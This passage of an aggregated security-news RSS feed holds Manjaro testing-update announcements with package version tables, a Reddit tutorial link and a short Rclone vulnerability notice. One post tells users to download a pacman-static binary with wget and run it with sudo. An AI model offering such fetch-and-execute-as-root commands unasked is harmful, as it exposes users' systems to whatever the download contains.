                      linux419-r8168           8.048.02-3           8.048.02-4
                  linux419-rtl8723bu           20200405-6           20200405-7
                   linux419-tp_smapi              0.43-59              0.43-60
                linux419-vhba-module          20200106-24          20200106-25
   linux419-virtualbox-guest-modules              6.1.6-6              6.1.6-7
    linux419-virtualbox-host-modules              6.1.6-6              6.1.6-7
                        linux419-zfs             0.8.3-23             0.8.3-24
                   linux44-acpi_call            1.1.0-152            1.1.0-153
                    linux44-bbswitch              0.8-152              0.8-153
                 linux44-broadcom-wl     6.30.223.271-122     6.30.223.271-123
                 linux44-ndiswrapper              1.62-34               1.63-1
                linux44-nvidia-340xx           340.108-16           340.108-17
                linux44-nvidia-390xx           390.132-22           390.132-23
                linux44-nvidia-418xx           418.113-21           418.113-22
                linux44-nvidia-430xx            430.64-20            430.64-21
                linux44-nvidia-435xx            435.21-22            435.21-23
                linux44-nvidia-440xx             440.82-4             440.82-5
                    linux44-nvidiabl             0.88-152             0.88-153
                       linux44-r8168           8.048.02-2           8.048.02-3
                   linux44-rt3562sta       2.4.1.1_r4-109       2.4.1.1_r4-110
                    linux44-tp_smapi              0.43-31              0.43-32
                 linux44-vhba-module          20200106-13          20200106-14
     linux44-virtualbox-host-modules              6.1.6-3              6.1.6-4
                         linux44-zfs             0.8.3-12             0.8.3-13
                   linux49-acpi_call            1.1.0-166            1.1.0-167
                    linux49-bbswitch              0.8-166              0.8-167
                 linux49-broadcom-wl     6.30.223.271-166     6.30.223.271-167
                 linux49-ndiswrapper              1.62-36               1.63-1
                linux49-nvidia-340xx           340.108-16           340.108-17
                linux49-nvidia-390xx           390.132-23           390.132-24
                linux49-nvidia-418xx           418.113-22           418.113-23
                linux49-nvidia-430xx            430.64-21            430.64-22
                linux49-nvidia-435xx            435.21-28            435.21-29
                linux49-nvidia-440xx             440.82-4             440.82-5
                    linux49-nvidiabl             0.88-166             0.88-167
                       linux49-r8168           8.048.02-2           8.048.02-3
                   linux49-rt3562sta       2.4.1.1_r4-150       2.4.1.1_r4-151
                    linux49-tp_smapi              0.43-34              0.43-35
                 linux49-vhba-module          20200106-13          20200106-14
     linux49-virtualbox-host-modules              6.1.6-3              6.1.6-4
                         linux49-zfs             0.8.3-12             0.8.3-13
                   linux54-acpi_call             1.1.0-44             1.1.0-45
                    linux54-bbswitch               0.8-44               0.8-45
                 linux54-broadcom-wl      6.30.223.271-44      6.30.223.271-45
                 linux54-ndiswrapper              1.62-44               1.63-1
                linux54-nvidia-340xx           340.108-36           340.108-37
                linux54-nvidia-390xx           390.132-44           390.132-45
                linux54-nvidia-418xx           418.113-44           418.113-45
                linux54-nvidia-430xx            430.64-44            430.64-45
                linux54-nvidia-435xx            435.21-44            435.21-45
                linux54-nvidia-440xx            440.82-11            440.82-12
                    linux54-nvidiabl              0.88-44              0.88-45
                       linux54-r8168           8.048.02-4           8.048.02-5
                   linux54-rtl8723bu           20200405-8           20200405-9
                    linux54-tp_smapi              0.43-44              0.43-45
                 linux54-vhba-module          20200106-29          20200106-30
    linux54-virtualbox-guest-modules              6.1.6-8              6.1.6-9
     linux54-virtualbox-host-modules              6.1.6-8              6.1.6-9
                         linux54-zfs             0.8.3-28             0.8.3-29
                 linux55-ndiswrapper              1.62-23               1.63-1
                   linux56-acpi_call             1.1.0-14             1.1.0-15
                    linux56-bbswitch               0.8-14               0.8-15
                 linux56-broadcom-wl      6.30.223.271-14      6.30.223.271-15
                 linux56-ndiswrapper              1.62-14               1.63-1
                linux56-nvidia-340xx           340.108-14           340.108-15
                linux56-nvidia-390xx           390.132-14           390.132-15
                linux56-nvidia-418xx           418.113-14           418.113-15
                linux56-nvidia-430xx            430.64-14            430.64-15
                linux56-nvidia-435xx            435.21-14            435.21-15
                linux56-nvidia-440xx            440.82-12            440.82-13
                       linux56-r8168           8.048.02-6           8.048.02-7
                   linux56-rtl8723bu          20200405-14          20200405-15
                    linux56-tp_smapi              0.43-14              0.43-15
                 linux56-vhba-module          20200106-14          20200106-15
    linux56-virtualbox-guest-modules             6.1.6-10             6.1.6-11
     linux56-virtualbox-host-modules             6.1.6-10             6.1.6-11
                         linux56-zfs             0.8.3-14             0.8.3-15
                 linux57-ndiswrapper             1.62-0.7             1.63-0.1
                   manjaro-architect             0.9.30-1             0.9.32-1
          manjaro-architect-launcher             0.9.30-1             0.9.32-1
                           pamac-cli              9.4.2-1              9.5.0-1
                       pamac-cli-dev            9.5.0rc-3              9.5.0-1
                        pamac-common              9.4.2-1              9.5.0-1
                    pamac-common-dev            9.5.0rc-3              9.5.0-1
                pamac-flatpak-plugin              9.4.2-1              9.5.0-1
            pamac-flatpak-plugin-dev            9.5.0rc-3              9.5.0-1
             pamac-gnome-integration              9.4.2-1              9.5.0-1
         pamac-gnome-integration-dev            9.5.0rc-3              9.5.0-1
                           pamac-gtk              9.4.2-1              9.5.0-1
                       pamac-gtk-dev            9.5.0rc-3              9.5.0-1
                   pamac-snap-plugin              9.4.2-1              9.5.0-1
               pamac-snap-plugin-dev            9.5.0rc-3              9.5.0-1
             pamac-tray-appindicator              9.4.2-1              9.5.0-1
         pamac-tray-appindicator-dev            9.5.0rc-3              9.5.0-1
                         xorg-server             1.20.8-1             1.20.8-2
                  xorg-server-common             1.20.8-1             1.20.8-2
                   xorg-server-devel             1.20.8-1             1.20.8-2
                  xorg-server-xephyr             1.20.8-1             1.20.8-2
                   xorg-server-xnest             1.20.8-1             1.20.8-2
                    xorg-server-xvfb             1.20.8-1             1.20.8-2
                xorg-server-xwayland             1.20.8-1             1.20.8-2
                            pamac-qt                    -              0.3.1-2


:: Different sync package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-05-08           2]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2020-05-10 - KDE-Git, Thunderbird 68.8.0, Pamac 9.5]]></title>
<description><![CDATA[Hello community,
Another testing branch update with some interesting updates for you!

1920×1080Redeem your free standard delivery of all Manjaro Merch. Ends today! #stayhome, #staysave, #stayhealthy

KDE-git packages got updated

Thunderbird is at 68.8.0


Pamac 9.5 got its released. Find out mo...]]></description>
<link>https://tsecurity.de/de/1112135/unix-server/testing-update-2020-05-10-kde-git-thunderbird-6880-pamac-95/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1112135/unix-server/testing-update-2020-05-10-kde-git-thunderbird-6880-pamac-95/</guid>
<pubDate>Sun, 10 May 2020 12:34:10 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello community,</p>
<p>Another <strong>testing</strong> branch update with some interesting updates for you!</p>
<p></p><div class="lightbox-wrapper"><a class="lightbox" href="https://pbs.twimg.com/media/EXUS41VXYAE5j_g?format=jpg&amp;name=large" title=""><img src="https://pbs.twimg.com/media/EXUS41VXYAE5j_g?format=jpg&amp;name=large" alt width="690" height="388"><div class="meta">
<svg class="fa d-icon d-icon-far-image svg-icon" aria-hidden="true"><use xlink:href="#far-image"></use></svg><span class="filename"></span><span class="informations">1920×1080</span><svg class="fa d-icon d-icon-discourse-expand svg-icon" aria-hidden="true"><use xlink:href="#discourse-expand"></use></svg></div></a></div><br><em>Redeem your free standard delivery of all <a href="https://shop.spreadshirt.de/manjaro/">Manjaro Merch</a>. Ends today! <span class="hashtag">#stayhome</span>, <span class="hashtag">#staysave</span>, <span class="hashtag">#stayhealthy</span></em>
<ul><li>
<strong>KDE-git</strong> packages got updated</li>
<li>
<strong>Thunderbird</strong> is at <a href="https://www.thunderbird.net/en-US/thunderbird/68.8.0/releasenotes/">68.8.0</a>
</li>
<li>
<strong>Pamac</strong> 9.5 got its <a href="https://gitlab.manjaro.org/applications/pamac/-/tags">released</a>. Find out <a href="https://forum.manjaro.org/t/pamac-9-5/141474">more</a>
</li>
<li>The usual upstream updates</li>
</ul><p>If you like following latest Plasma development you may also like to check out our current version of <a href="https://osdn.net/projects/manjaro-community/storage/kde-dev/20.0/">manjaro-kde-dev</a>, which we build on a regular basis against kde-git master packages. Also check out our latst release candidates of <strong>Manjaro Lysia 20.0.1</strong>! <a href="https://osdn.net/projects/manjaro/storage/xfce/20.0.1-rc1/">XFCE</a>, <a href="https://osdn.net/projects/manjaro/storage/kde/20.0.1-rc1/">KDE</a> and <a href="https://osdn.net/projects/manjaro/storage/gnome/20.0.1-rc1/">Gnome</a></p>
<hr><h3>Upstream notice</h3>
<p><strong>Arch</strong> updated their default compression to <a href="https://lists.archlinux.org/pipermail/arch-dev-public/2019-December/029752.html">zstd</a>. We adopted to the same standard. More and more packages will have the <code>zst</code> extension from now on. If you get for what ever reason an error with ZSTD not supported as archive format you can do this:</p>
<pre><code class="lang-auto">sudo pacman -Syy
sudo pacman -S pacman-static
sudo pacman-static -Syyu
</code></pre>
<hr><p><strong>Our current supported kernels</strong></p>
<ul><li>linux316 3.16.83</li>
<li>linux44 4.4.222</li>
<li>linux49 4.9.222</li>
<li>linux414 4.14.179</li>
<li>linux419 4.19.121</li>
<li>linux54 5.4.39</li>
<li>linux55 5.5.19 EOL</li>
<li>linux56 5.6.11</li>
<li>linux57 5.7-rc4</li>
<li>linux54-rt 5.4.28_rt19</li>
<li>linux56-rt 5.6.10_rt5</li>
</ul><p><strong>Package Changes</strong> (Sun May 10 10:41:45 CEST 2020)</p>
<ul><li>testing community x86_64:  96 new and 92 removed package(s)</li>
<li>testing extra x86_64:  32 new and 32 removed package(s)</li>
</ul><pre><code class="lang-auto">:: Different overlay package(s) in repository community x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-05-09           2020-05-10
-------------------------------------------------------------------------------
                          breeze-git5.18.80.r1988.g6283b3e0-15.18.80.r1989.g34862b27-1
                    breeze-icons-git5.70.0.r1554.g3e961ab3-15.70.0.r1555.gb94a7284-1
                               cpu-x3.2.4.r248.g10766c6-13.2.4.r256.g33c0406-1
             extra-cmake-modules-git5.70.0.r3151.g8d18163-15.70.0.r3153.gbac7608-1
                      kbookmarks-git5.70.0.r331.g8a28231-15.70.0.r333.g1d8d223-1
                     kcompletion-git5.70.0.r358.g9d05a00-15.70.0.r359.g5b08593-1
                         kconfig-git5.70.0.r688.g311e308-15.70.0.r689.g8e0f840-1
                     kcoreaddons-git5.70.0.r974.g7804a0c-15.70.0.r975.g0824e28-1
                kdeplasma-addons-git5.18.80.r8335.g786062f1d-15.18.80.r8336.g1d64bd119-1
                             kio-git5.70.0.r3930.g692d9bc8-15.70.0.r3937.g81a7b118-1
                      kitemviews-git5.70.0.r267.g5ccc82f-15.70.0.r268.gdf9e5d3-1
                      knetattach-git5.18.80.r7596.g82e7a6b68-15.18.80.r7597.geeab79954-1
                  knotifications-git5.70.0.r529.g9a13dd2-15.70.0.r532.ga39883c-1
                  kwidgetsaddons-git5.70.0.r663.g5a2ea81-15.70.0.r668.g5904c47-1
                            libcpuid 0.4.1.r35.g9d22c61-1 0.4.1.r50.g21e4b1f-1
              linux56-rt-ndiswrapper               1.62-3               1.63-1
                    matcha-gtk-theme           20200505-1           20200509-1
      plasma-browser-integration-git5.18.80.r1086.g64a63f2b-15.18.80.r1087.g811ae0dd-1
                  plasma-desktop-git5.18.80.r7596.g82e7a6b68-15.18.80.r7597.geeab79954-1
                       plasma-nm-git5.18.80.r2862.g040a5c8c-15.18.80.r2863.g7c915638-1
     plasma-workspace-wallpapers-git5.18.80.r198.gff9dda6-15.18.80.r199.gf9d6a73-1
                      powerdevil-git5.18.80.r2271.g45dd7bbf-15.18.80.r2272.gaa60c4f6-1
                         purpose-git5.70.0.r754.g095ed6b-15.70.0.r756.g8cd6cca-1
              linux54-rt-ndiswrapper                    -               1.63-1
                      qgnomeplatform                    -   0.6.0+8+gd4277c9-1


:: Different sync package(s) in repository community x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-05-09           2020-05-10
-------------------------------------------------------------------------------
               aarch64-linux-gnu-gcc              9.3.0-1             10.1.0-1
                               acorn            1:7.1.1-1            1:7.2.0-1
                          aliyun-cli             3.0.37-2             3.0.42-1
                                anki             2.1.23-1             2.1.26-1
                        ansible-lint              4.2.0-1              4.2.0-3
                         baidupcs-go              3.6.2-1              3.6.2-2
                              coturn            4.5.1.1-8            4.5.1.2-1
                                croc              8.0.9-1             8.0.10-1
                         deepin-dock            5.1.0.6-1            5.1.0.8-1
              deepin-screen-recorder           5.8.0.10-2           5.8.0.11-1
                      dns-over-https              2.2.1-2              2.2.1-3
                                dune              2.5.0-1              2.5.1-1
                              erlang             22.2.7-1               22.3-1
                         erlang-docs               22.2-1               22.3-1
                          erlang-nox             22.2.7-1               22.3-1
                     erlang-unixodbc             22.2.7-1               22.3-1
                              fcitx5     0.0.0.20200509-2     0.0.0.20200509-3
               fcitx5-chinese-addons     0.0.0.20200509-1     0.0.0.20200509-2
                                fish              3.1.1-1              3.1.2-1
               freepats-general-midi           20200405-1           20200508-1
                              glider             0.10.0-1             0.10.0-2
                           gocryptfs              1.7.1-2              1.8.0-1
                               gsoap            2.8.101-1            2.8.102-1
                                helm              3.2.0-1              3.2.1-1
                             libvips              8.9.1-1              8.9.2-1
                             liteide               36.3-2               37.1-1
                         lua51-bitop              1.0.2-8              1.0.2-9
                         lua52-bitop              1.0.2-8              1.0.2-9
                                 lxd              4.0.1-1                4.1-1
                     man-pages-zh_cn            1.6.3.3-1            1.6.3.4-1
                     man-pages-zh_tw            1.6.3.3-1            1.6.3.4-1
                   massif-visualizer              0.7.0-2              0.7.0-3
                      matrix-synapse             1.11.0-1             1.12.4-1
                                mcqd              1.0.0-1              1.0.0-2
                          metasploit             5.0.86-1             5.0.88-1
                             mimetic              0.9.8-1              0.9.8-2
             nextcloud-app-bookmarks            1:3.0.0-1            1:3.0.4-1
                  nextcloud-app-mail              1.3.3-1              1.3.4-1
                 nextcloud-app-notes              3.2.0-1              3.3.0-1
                                opam              2.0.6-2              2.0.7-1
                           pam_mount               2.16-4               2.16-5
                               pbpst              1.4.1-1              1.4.1-2
                                  pd             0.50.2-2             0.50.2-3
              perl-scalar-list-utils               1.54-1               1.55-1
                                po4a               0.57-1               0.58-1
                            powertop               2.11-1               2.12-1
                       python-bleach              3.1.3-1              3.1.5-1
                       python-pyglet              1.5.4-2              1.5.5-1
                python-pytest-pylint             0.15.1-1             0.16.0-1
                       python-yaspin             0.16.0-1             0.17.0-1
                                qmmp              1.3.7-1              1.4.0-1
                            qrupdate              1.1.2-3              1.1.2-4
                               qvkbd        git20170102-1        git20170102-2
              rapid-photo-downloader             0.9.23-1             0.9.24-1
                              rclone             1.51.0-3             1.51.0-4
                      rime-cantonese     0.0.0.20200509-2     0.0.0.20200510-1
                             ripgrep             12.0.1-1             12.1.0-1
              sage-data-polytopes_db           20170220-1           20170220-2
                                  sd              0.7.4-1              0.7.5-1
                            skanlite            2.1.0.1-1            2.1.0.1-2
                           syncthing              1.4.2-1              1.5.0-1
                  syncthing-relaysrv              1.4.2-1              1.5.0-1
                    telegram-desktop              2.1.3-1              2.1.4-1
                             tellico              3.2.3-1                3.3-1
                          testssl.sh              3.0.1-1              3.0.2-1
                               tilda              1.5.1-1              1.5.2-1
                               v2ray             4.23.1-1             4.23.1-2
         v2ray-domain-list-community       202005061230-1       202005092152-1
                        vim-nerdtree              6.6.0-1              6.6.1-1
                              global                    -              6.6.4-1
                         staticcheck                    -           2020.1.3-1


:: Different overlay package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-05-09           2020-05-10
-------------------------------------------------------------------------------
                linux316-ndiswrapper              1.62-17               1.63-1
                linux414-ndiswrapper              1.62-46               1.63-1
                linux419-ndiswrapper              1.62-60               1.63-1
                 linux44-ndiswrapper              1.62-35               1.63-1
                 linux49-ndiswrapper              1.62-37               1.63-1
                 linux54-ndiswrapper              1.62-45               1.63-1
                 linux55-ndiswrapper              1.62-23               1.63-1
                 linux56-ndiswrapper              1.62-15               1.63-1
                 linux57-ndiswrapper             1.62-0.7             1.63-0.1
                           pamac-cli            9.5.0rc-1              9.5.0-1
                       pamac-cli-dev            9.5.0rc-1              9.5.0-1
                        pamac-common            9.5.0rc-1              9.5.0-1
                    pamac-common-dev            9.5.0rc-1              9.5.0-1
                pamac-flatpak-plugin            9.5.0rc-1              9.5.0-1
            pamac-flatpak-plugin-dev            9.5.0rc-1              9.5.0-1
             pamac-gnome-integration            9.5.0rc-1              9.5.0-1
         pamac-gnome-integration-dev            9.5.0rc-1              9.5.0-1
                           pamac-gtk            9.5.0rc-1              9.5.0-1
                       pamac-gtk-dev            9.5.0rc-1              9.5.0-1
                   pamac-snap-plugin            9.5.0rc-1              9.5.0-1
               pamac-snap-plugin-dev            9.5.0rc-1              9.5.0-1
             pamac-tray-appindicator            9.5.0rc-1              9.5.0-1
         pamac-tray-appindicator-dev            9.5.0rc-1              9.5.0-1


:: Different sync package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-05-09           2020-05-10
-------------------------------------------------------------------------------
                         imagemagick          7.0.10.10-2          7.0.10.11-1
                     imagemagick-doc          7.0.10.10-2          7.0.10.11-1
                          libmm-glib             1.12.8-1            1.12.10-1
                              libqmi            1.24.10-1            1.24.12-1
                        modemmanager             1.12.8-1            1.12.10-1
                         thunderbird             68.7.0-2             68.8.0-1
                        wxgtk-common              3.0.5-1            3.0.5.1-1
                              wxgtk2              3.0.5-1            3.0.5.1-1
                              wxgtk3              3.0.5-1            3.0.5.1-1     
</code></pre>
<div class="poll" data-poll-status="open" data-poll-type="regular" data-poll-name="poll">
<div>
<div class="poll-container">
<ul><li data-poll-option-id="893d9543968a33fa1039e2d7c2aff9f3">No issue, everything went smoothly</li>
<li data-poll-option-id="f62cf202dc0ce246aa612290c3f33f1f">Yes there was an issue. I was able to resolve it myself.(Please post your solution)</li>
<li data-poll-option-id="e1ee941aacf54cee0c82939acae184cc">Yes i am currently experiencing an issue due to the update. (Please post about it)</li>
</ul></div>
<div class="poll-info">
<p>
<span class="info-number">0</span>
<span class="info-label">voters</span>
</p>
</div>
</div>
</div>
<p>Check if your mirror has already synced:</p>
<ul><li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul><p><small>2 posts - 1 participant</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2020-05-10-kde-git-thunderbird-68-8-0-pamac-9-5/141596">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[I created a tutorial on setting up rclone]]></title>
<description><![CDATA[submitted by    /u/Hasmar04  [link]   [comments]]]></description>
<link>https://tsecurity.de/de/1031534/linux-tipps/i-created-a-tutorial-on-setting-up-rclone/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1031534/linux-tipps/i-created-a-tutorial-on-setting-up-rclone/</guid>
<pubDate>Sun, 23 Feb 2020 12:15:16 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/Hasmar04"> /u/Hasmar04 </a> <br><span><a href="https://www.reddit.com/r/rclone/comments/f80fgq/i_created_a_tutorial_on_setting_up_rclone/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/f87tmy/i_created_a_tutorial_on_setting_up_rclone/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rclone 1.42 Sync privilege escalation]]></title>
<description><![CDATA[A vulnerability was found in Rclone 1.42 and classified as critical. Affected by this issue is an unknown code block of the component Sync. There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.]]></description>
<link>https://tsecurity.de/de/1031297/sicherheitsluecken/rclone-142-sync-privilege-escalation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1031297/sicherheitsluecken/rclone-142-sync-privilege-escalation/</guid>
<pubDate>Sat, 22 Feb 2020 20:18:06 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.rclone">Rclone 1.42</a> and classified as critical. Affected by this issue is an unknown code block of the component <em>Sync</em>. There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2020-02-11 - Kernels, KDE-Git, KDE Framework, Firefox 73.0, Systemd 244.2]]></title>
<description><![CDATA[@philm wrote:
            
              Hello community,
here is another Testing Update.

1920×1080manjaro-kde-dev got updated with latest master packages
Some feature-updates:
We updated our RT-Kernel to 5.4.17_rt9 and added linux56 series

linux53 is now depreciated. Users will automatically u...]]></description>
<link>https://tsecurity.de/de/1019451/unix-server/testing-update-2020-02-11-kernels-kde-git-kde-framework-firefox-730-systemd-2442/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1019451/unix-server/testing-update-2020-02-11-kernels-kde-git-kde-framework-firefox-730-systemd-2442/</guid>
<pubDate>Tue, 11 Feb 2020 12:02:13 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://forum.manjaro.org/u/philm">@philm</a> wrote:</p>
            <blockquote>
              <p>Hello community,</p>
<p>here is another <strong>Testing Update</strong>.</p>
<p></p><div class="lightbox-wrapper"><a class="lightbox" href="https://pbs.twimg.com/media/EQbc0W0XUAArj_y?format=jpg&amp;name=large" title=""><img src="https://pbs.twimg.com/media/EQbc0W0XUAArj_y?format=jpg&amp;name=large" alt width="690" height="388"><div class="meta">
<svg class="fa d-icon d-icon-far-image svg-icon" aria-hidden="true"><use xlink:href="#far-image"></use></svg><span class="filename"></span><span class="informations">1920×1080</span><svg class="fa d-icon d-icon-discourse-expand svg-icon" aria-hidden="true"><use xlink:href="#discourse-expand"></use></svg></div></a></div><br><em><a href="https://osdn.net/projects/manjaro-community/storage/kde-dev/19.0/">manjaro-kde-dev</a> got updated with latest <strong>master</strong> packages</em>
<p>Some feature-updates:</p>
<ul><li>We updated our RT-Kernel to 5.4.17_rt9 and added <strong>linux56</strong> series</li>
<li>
<strong>linux53</strong> is now depreciated. Users will automatically update to <strong>linux54</strong>
</li>
<li>Some more <strong>KDE-Git</strong> packages</li>
<li>
<strong>KDE-Frameworks</strong> got updated to <a href="https://kde.org/announcements/kde-frameworks-5.67.0.php">5.67.0</a>
</li>
<li>
<strong>Firefox</strong> is now at <a href="https://www.mozilla.org/en-US/firefox/73.0/releasenotes/">73.0</a>
</li>
<li>
<strong>Systemd</strong> is now at <strong>244.2</strong>. Please test and report any regressions</li>
</ul><p>If you like following latest Plasma development you may also like to check out our current version of <a href="https://osdn.net/projects/manjaro-community/storage/kde-dev/19.0/">manjaro-kde-dev</a>, which we build on a regular basis against kde-git master packages. Also check out our <a href="https://osdn.net/projects/manjaro/storage/">current 19.0-pre4 ISOs</a> and give us the needed feedback. You might also want to <a href="https://twitter.com/ManjaroLinux/status/1213654187344646145">give our latest spin</a> with <strong>NX-Desktop</strong> a try ...</p>
<p>As always we appreciate your input and feedback for the updates.</p>
<hr><h3>Upstream notice</h3>
<p><strong>Arch</strong> updated their default compression to <a href="https://lists.archlinux.org/pipermail/arch-dev-public/2019-December/029752.html">zstd</a>. We adopted to the same standard. More and more packages will have the <code>zst</code> extension from now on. If you get for what ever reason an error with ZSTD not supported as archive format you can do this:</p>
<pre><code class="lang-auto">wget https://pkgbuild.com/~eschwartz/repo/x86_64-extracted/pacman-static
chmod +x pacman-static
sudo ./pacman-static -Syyu
</code></pre>
<hr><p><strong>Our current supported kernels</strong></p>
<ul><li>linux316 3.16.81</li>
<li>linux44 4.4.213</li>
<li>linux49 4.9.213</li>
<li>linux414 4.14.170</li>
<li>linux419 4.19.102</li>
<li>linux54 5.4.18</li>
<li>linux55 5.5.2</li>
<li>linux56 5.6-rc1</li>
<li>linux419-rt 4.19.94_rt39</li>
<li>linux54-rt 5.4.17_rt9</li>
</ul><p><strong>Package Changes</strong> (Tue Feb 11 08:52:02 CET 2020)</p>
<ul><li>testing community x86_64:  333 new and 330 removed package(s)</li>
<li>testing core x86_64:  16 new and 16 removed package(s)</li>
<li>testing extra x86_64:  226 new and 238 removed package(s)</li>
<li>testing multilib x86_64:  9 new and 9 removed package(s)</li>
</ul><pre><code class="lang-auto">:: Different overlay package(s) in repository community x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-02-07           2020-02-11
-------------------------------------------------------------------------------
                          attica-git5.67.0.r739.g5f799b9-15.68.0.r740.gbdca267-1
                           baloo-git5.67.0.r2688.gb0c68d67-15.68.0.r2690.g17b13fa5-1
                        bluez-qt-git5.67.0.r579.gc4fd104-15.68.0.r581.g951a31d-1
                          breeze-git5.18.80.r1960.g02c3c53f-15.18.80.r1963.g1770ac99-1
                    breeze-icons-git5.67.0.r1461.gdc8c5e4d-15.68.0.r1466.gb894f1da-1
                               cpu-x3.2.4.r180.g18c5027-13.2.4.r181.gd4d3237-1
                        discover-git5.18.80.r7573.gea0a8ac9-15.18.80.r7587.g41eefd8c-1
                         edid-decode       r388.b27dc54-1       r401.1932cfe-1
             extra-cmake-modules-git5.67.0.r3130.gee05317-15.68.0.r3135.gda4c810-1
            frameworkintegration-git5.67.0.r503.gfb623ca-15.68.0.r505.g70c2f0d-1
      gnome-shell-extension-arc-menu           40.8+dev-141+Stable+6+ged28ec8-1
gnome-shell-extension-desktop-icons-ng              0.8.0-2              0.9.1-1
                     kactivities-git5.67.0.r1269.g20014f7d-15.68.0.r1271.gdf52a19f-1
               kactivities-stats-git5.67.0.r266.g06f6f63-15.68.0.r268.gc55f145-1
               kactivitymanagerd-git5.15.80.r1256.g06c613c-15.15.80.r1259.gd032d81-1
                         kapidox-git5.67.0.r451.gc4a632a-15.68.0.r452.g3f2cc2f-1
                        karchive-git5.67.0.r406.ga7cfd80-15.68.0.r408.g7ba2324-1
                           kauth-git5.67.0.r335.gafbfd5d-15.68.0.r340.g4d241b3-1
                      kbookmarks-git5.67.0.r313.ge482bf5-15.68.0.r315.g03bc359-1
                        kcmutils-git5.67.0.r367.gc2697ba-15.68.0.r369.g11f1b40-1
                         kcodecs-git5.67.0.r293.g793eeb9-15.68.0.r294.g489fcfe-1
                     kcompletion-git5.67.0.r347.ga8c4e2d-15.68.0.r349.gdde7c78-1
                         kconfig-git5.67.0.r656.gd467392-15.68.0.r658.g974a677-1
                  kconfigwidgets-git5.67.0.r440.gdb85985-15.68.0.r443.g13e3182-1
                     kcoreaddons-git5.67.0.r943.gee3eaa8-15.68.0.r946.gfcb1eff-1
                          kcrash-git5.67.0.r286.ga267317-15.68.0.r288.g06c3968-1
                     kdbusaddons-git5.67.0.r292.gce0111a-15.68.0.r294.g02ec5e8-1
                    kdeclarative-git5.67.0.r746.gcacff0a-15.68.0.r749.g9127da0-1
                            kded-git5.67.0.r295.ga128711-15.68.0.r297.g6c48c0b-1
                 kdelibs4support-git5.67.0.r920.gb2287b64-15.68.0.r921.ge3711d1a-1
                kdeplasma-addons-git5.18.80.r8278.g19ee2d7a5-15.18.80.r8284.g30a5ea828-1
                 kdesignerplugin-git5.67.0.r266.g4b62026-15.68.0.r268.g401c438-1
                           kdesu-git5.67.0.r384.g0023641-15.68.0.r386.g0739d30-1
                       kdewebkit-git5.67.0.r217.g71cfa41-15.68.0.r218.gaa099f3-1
                          kdnssd-git5.67.0.r245.g28bcf26-15.68.0.r246.g0721f1f-1
                       kdoctools-git5.67.0.r522.g8dd0d2c-15.68.0.r524.gb05f529-1
                      kemoticons-git5.67.0.r304.g1740d54-15.68.0.r306.ge38b475-1
                   kfilemetadata-git5.67.0.r677.g33195ad-15.68.0.r679.gc2be962-1
                    kglobalaccel-git5.67.0.r343.gcad76e5-15.68.0.r345.g834a63a-1
                      kguiaddons-git5.67.0.r260.g61e37fd-15.68.0.r264.g9cdefdd-1
                       kholidays-git5.67.0.r839.g5cb0aca-15.68.0.r841.gca0230e-1
                           khtml-git5.67.0.r483.g4ab69fe-15.68.0.r484.g845800e-1
                           ki18n-git5.67.0.r379.g7cf2d02-15.68.0.r380.ge309154-1
                     kiconthemes-git5.67.0.r408.ge343bc8-15.68.0.r410.g617d782-1
                       kidletime-git5.67.0.r235.g11f5cd0-15.68.0.r236.g2dca767-1
                   kimageformats-git5.57.0.r258.gcba2328-15.57.0.r259.g5c66570-1
                     kinfocenter-git5.18.80.r1624.g99c7273-15.18.80.r1633.g0ebbd9b-1
                           kinit-git5.67.0.r327.g791fdec-15.68.0.r329.gb824f0f-1
                             kio-git5.67.0.r3769.g8f3e8be3-15.68.0.r3776.gacc4f46a-1
                       kirigami2-git5.67.0.r2060.g4b93444e-15.68.0.r2068.g3f55e649-1
                     kitemmodels-git5.67.0.r406.g4cea801-15.68.0.r409.gf2ee1d5-1
                      kitemviews-git5.67.0.r257.g1047d21-15.68.0.r258.g25d31be-1
                     kjobwidgets-git5.67.0.r280.gc5bbb32-15.68.0.r282.g1b9e004-1
                             kjs-git5.67.0.r271.ga3442ad-15.68.0.r272.g295e924-1
                        kjsembed-git5.67.0.r231.g099e626-15.68.0.r233.g9be4d20-1
                    kmediaplayer-git5.67.0.r225.ge1f9ca8-15.68.0.r227.g4a5fb71-1
                      knetattach-git5.18.80.r7380.g5bb3ebc94-15.18.80.r7404.gf32f0f0c3-1
                       knewstuff-git5.67.0.r773.g6ed4be8-15.68.0.r778.g68a26ad0-1
                  knotifications-git5.67.0.r500.g426f5d6-15.68.0.r503.gfd0bcf4-1
                   knotifyconfig-git5.67.0.r268.g8430353-15.68.0.r270.g0c40b2b-1
                        kpackage-git5.67.0.r561.g0c6a611-15.68.0.r563.g2616443-1
                          kparts-git5.67.0.r376.gaa89766-15.68.0.r378.g41e5bb1-1
                         kpeople-git5.67.0.r1236.g9af84c5-15.68.0.r1239.ge9b1d3a-1
